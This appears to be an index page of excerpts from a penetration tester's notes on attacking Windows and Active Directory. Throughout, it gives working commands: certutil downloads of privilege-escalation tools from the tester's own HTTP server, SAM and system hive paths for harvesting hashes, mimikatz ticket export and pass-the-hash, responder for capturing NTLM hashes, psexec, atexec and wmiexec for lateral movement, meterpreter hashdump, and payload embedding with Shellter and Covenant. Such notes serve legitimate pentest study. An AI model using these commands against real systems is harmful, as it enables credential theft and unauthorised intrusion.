- See also the Binary analysis post. Windows uses the PE (Portable Executable) format for executable files. This is a binary format which can be used as an English (light ‘xkcd’) — Imgur has a graphical overview.
- Named pipes: A named pipe is a method for remote or local IPC (inter-process communication). Basic commands: Where is a program? where ssh Restart the system now: shutdown /r /t 0 Set file system attributes (which are shown with the dir command): attrib +r file.exe Set file system permissions (which are shown with the icacls command):…
- Files with the extension .Library-ms are similar to macOS’s Volumes. They can contain files and directories which look like local files in Windows Explorer. Many AV/malware systems do not detect them currently. Create a Windows Library “Directory”. Preparation: Install a DAV share somewhere which is reachable from the victim’s system and which points to a…
- Keyboard functions: CTRL+S Find sequence of commands; SHIFT+F9 Pass exception
- Assume you have a buffer overflow vulnerability. You can control the EIP, but your shellcode is never executed. Your shellcode is executed when a ret instruction is executed which jumps to the address you overwrote. But maybe the ret at the end of the function where the buffer overflow occurs is never reached, because you overwrote the…
- SID (Security Identifiers): All elements have attributes. They are identified via a Security Identifier (SID). The structure of a SID: Example: The Domain Identifier is the SID without the last RID part. Examples for well-known SIDs: Basic Windows security access control, Security context, Mandatory Integrity Control and integrity levels. Windows (from Vista on) has five integrity levels:…
- .NET attack framework: https://github.com/cobbr/Covenant Usage: Create a listener on the attack system. Add a launcher to the listener. The attack system now provides a payload file the victim has to start. You can use UrbanBishop to inject the payload into a running process. As soon as the payload is executed, Covenant will show on the dashboard…
- File and directory integrity levels: C:\Users\User>icacls hallo hallo NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) WINDEV2012EVAL\User:(I)(F) Mandatory Label\High Mandatory Level:(NW) (I)(F) means that the corresponding user or group has (F) Full permission on the file and that the permissions are inherited (I) from the parent directory. Note that the Read right (R) also enables execution of that file! (There…
- Various: Show who else is logged in. qwinsta Open the Event Viewer and search in the logs. Have fun! Network enumeration: Show the network configuration. Are there multiple interfaces? ipconfig /all Routing information: route print Show current network connections. After checking this command: CHECK all ports against the previously found ones! netstat -ano Check the ARP cache…
- Determine if the system has the WSL with bash: where /R C:\windows bash.exe If bash.exe is there and the WSL is running, then commands can be run as root (!) like: C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.19041.423_none_1da742a41b53e164\bash.exe whoami Install the WSL: To install the WSL, a system shell is unfortunately required. See this article for installation.
- Execution: If you cannot execute an exe file, try these options: Windows firewall / netsh: Check firewall state: netsh advfirewall show currentprofile netsh advfirewall show state If the firewall is active, list the configuration: netsh advfirewall show config Example of how to add exceptions to the firewall via the command line as an administrator: C:\Windows\temp> netsh advfirewall firewall…
- Grab the SAM and system files: %windir%\repair\sam %windir%\System32\config\RegBack\SAM %windir%\system32\config\SAM %windir%\repair\system %windir%\System32\config\RegBack\system %windir%\system32\config\system (Re-)Run the credential retrievers from the script page.
- Prepare your own system: cd p151.general.1/scripts/privesc/windows python -m SimpleHTTPServer 80 Prepare the target: set NTPSRV=$ownIp mkdir C:\Windows\System32\spool\drivers\color\wsc cd C:\Windows\System32\spool\drivers\color\wsc Download most scripts at once (>30 MB!): certutil.exe -urlcache -split -f "http://$NTPSRV/7za.exe" certutil.exe -urlcache -split -f "http://$NTPSRV/_ex.zip" 7za.exe x _ex.zip WinPeas (Github): winPEAS.bat, winPEASx86.exe, winPEASx64.exe Powerless (Github): certutil.exe -urlcache -split -f "http://$NTPSRV/Powerless.bat" Powerless.bat Powerless.bat Windows Exploit Suggester NG (Github)…
- dir General: Usual commands: Therefore: Remember to use dir /R /as /ah -force. tree: Start with creating a list of all directories and files. Download it. It’s way easier to look at it in a local editor and it’s stored for the future as well. tree c:\ > C:\Windows\Temp\dsys\dirs.txt dir /s /R /as /ah c:\ > C:\Windows\Temp\dsys\files.txt (Download the files)…
- General system enumeration: Get general information about the OS: systeminfo Get the environment variables: set Enumerate cached credentials: cmdkey /list If the current system is not known yet, try to determine the version via one of the following files: Process enumeration: tasklist /V; tasklist /V | find "cmd.exe" // Search for a command; tasklist /V /fi "USERNAME eq NT…
- After these steps, more things to do: Work with processes: For enumeration of processes, see the Basic Windows system enumeration post. Kill a process: taskkill /PID $pid taskkill /IM notepad.exe pskill /accepteula $pid // With Sysinternals tools Suspend and continue a running process with Sysinternals tools: pssuspend /accepteula notepad.exe ... pssuspend /accepteula -r notepad.exe Work with DLLs: Show all…
- responder: Listen with responder on a network and wait for AD systems to ask for a DC. This can reveal an NTLM hash. (Source) Start responder on your own system: sudo responder -I tun0 --wpad Connect from the target system to this system via SMB, in Windows Explorer or on the command line via dir…
- With username/password: With psexec (prerequisites: the ADMIN$ share is available, the user is part of the local administrator group on the target). With psexec via Metasploit: use exploit/windows/smb/psexec With atexec (Impacket): atexec.py dom/user:pass@$target cmd.exe With wmiexec: wmiexec.py domain.local/$target:$password@$ip With Smbmap: smbmap -u ariley -p 'pass' -d WORKGROUP -x 'whoami' -H $target With Wmic (To run a…
- Automates Windows enumeration. Github page. Usage: Seatbelt.exe -group=all Run Seatbelt.exe without arguments to see the possible parameters. Example: Seatbelt.exe OSInfo Processes Remote: From another Windows system, Seatbelt can connect to a victim and perform commands there. Seatbelt.exe LogonSessions -computername=$victim -username=bob -password=bobber Command aggregation: There are already some groups defined which perform multiple tests at once. Seatbelt.exe -group=system [-computername=...] Seatbelt.exe…
- The DPAPI is a Windows system which stores passwords bound to the local system. In the user directory, the keys are stored in the AppData\Roaming\Microsoft\Protect\<SID> directory. From the user’s password, a master key is derived. When the user changes their password, a new master key is generated as well — and all old master…
- Shellter can add a reverse shell payload into an exe file.
- Log on to another system with an NTLM hash. Scenario: Then, use mimikatz to inject another user’s NTLM hash into the secret storage: Steal another user’s session. Scenario: Then, with the use of mimikatz: privilege::debug sekurlsa::tickets /export This exports the available tickets into the working directory (suffix .kirbi). Then, choose one file/ticket from the correct user and service. For…
- Windows creates and stores credentials in the Local Security Authority Subsystem Service (LSASS) in memory. On the filesystem, the SAM database stores the hashes. Use Mimikatz. Usage: Enable debug mode. This uses the SeDebugPrivilege so that we are able to communicate with other processes. privilege::debug Try to elevate privileges to obtain SYSTEM user privileges:…
- BloodHound analyzes and presents Active Directory data. SharpHound is the data collector which runs on a compromised AD system. On the target: On your own system:
- Without shell access / With shell access: Choose one method to enumerate. 1. User and group enumeration with net (!) See what roles/privileges THIS USER has, also locally. Maybe he/she already has administrative privileges. whoami /all List (and store!) the users of the domain: net user /domain List (and store!) information like full names, group memberships, etc.…
- Collection of privesc scripts. To start, upload PowerView.ps1 and: powershell -exec bypass PS> Import-Module .\PowerView.ps1 See the github site for all commands. General enumeration: powershell -exec bypass PS> . .\PowerUp.ps1 PS> Invoke-AllChecks Or: powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks" About users: Enumerate all users. Get-NetUser Enumerate all users which do not require Kerberos preauth. Get-NetUser -PreauthNotRequired Returns…
- Mainly post exploitation for AD environments. (Download — also included in the Kali sources) Quick usage for privilege escalation. General usage: Metasploit syntax / PSE syntax. Note: After usemodule don’t forget to go “back” and to “interact” with the agent to see job results! Commands with an asterisk require a high-integrity Empire agent. To upgrade one…
- The Windows registry is a central data store for the operating system as well as for applications. It’s a key-value store in a tree structure. A hive is a set of keys and their values. The root hives are (Short / Long / Content / Source file): HKCR HKEY_CLASSES_ROOT Information about file types and properties; HKCC HKEY_CURRENT_CONFIG Information about…
- Checklist: A domain of a DC consists of the following elements: An object in AD may have a set of ACEs (Access Control Entries) which is called an ACL (Access Control List). An object’s ACEs can be retrieved in PS with Get-ObjectAcl [-Identity] $object. The SCM (Service Control Manager) contains a database of installed services…
- Windows clients use SAM files. Windows DCs use ntds.dit to store all hashes of the domain. SAM: C:\windows\repair\sam C:\windows\System32\config\SAM C:\windows\System32\config\RegBack\SAM Alternatives in meterpreter: run post/windows/gather/hashdump run post/windows/gather/smart_hashdump run hashdump hashdump (load the module first: use priv) creds_all If hashdump doesn’t work: Notes: Format: Username : UID : LM hash : NTLM hash : : : For hashcat,…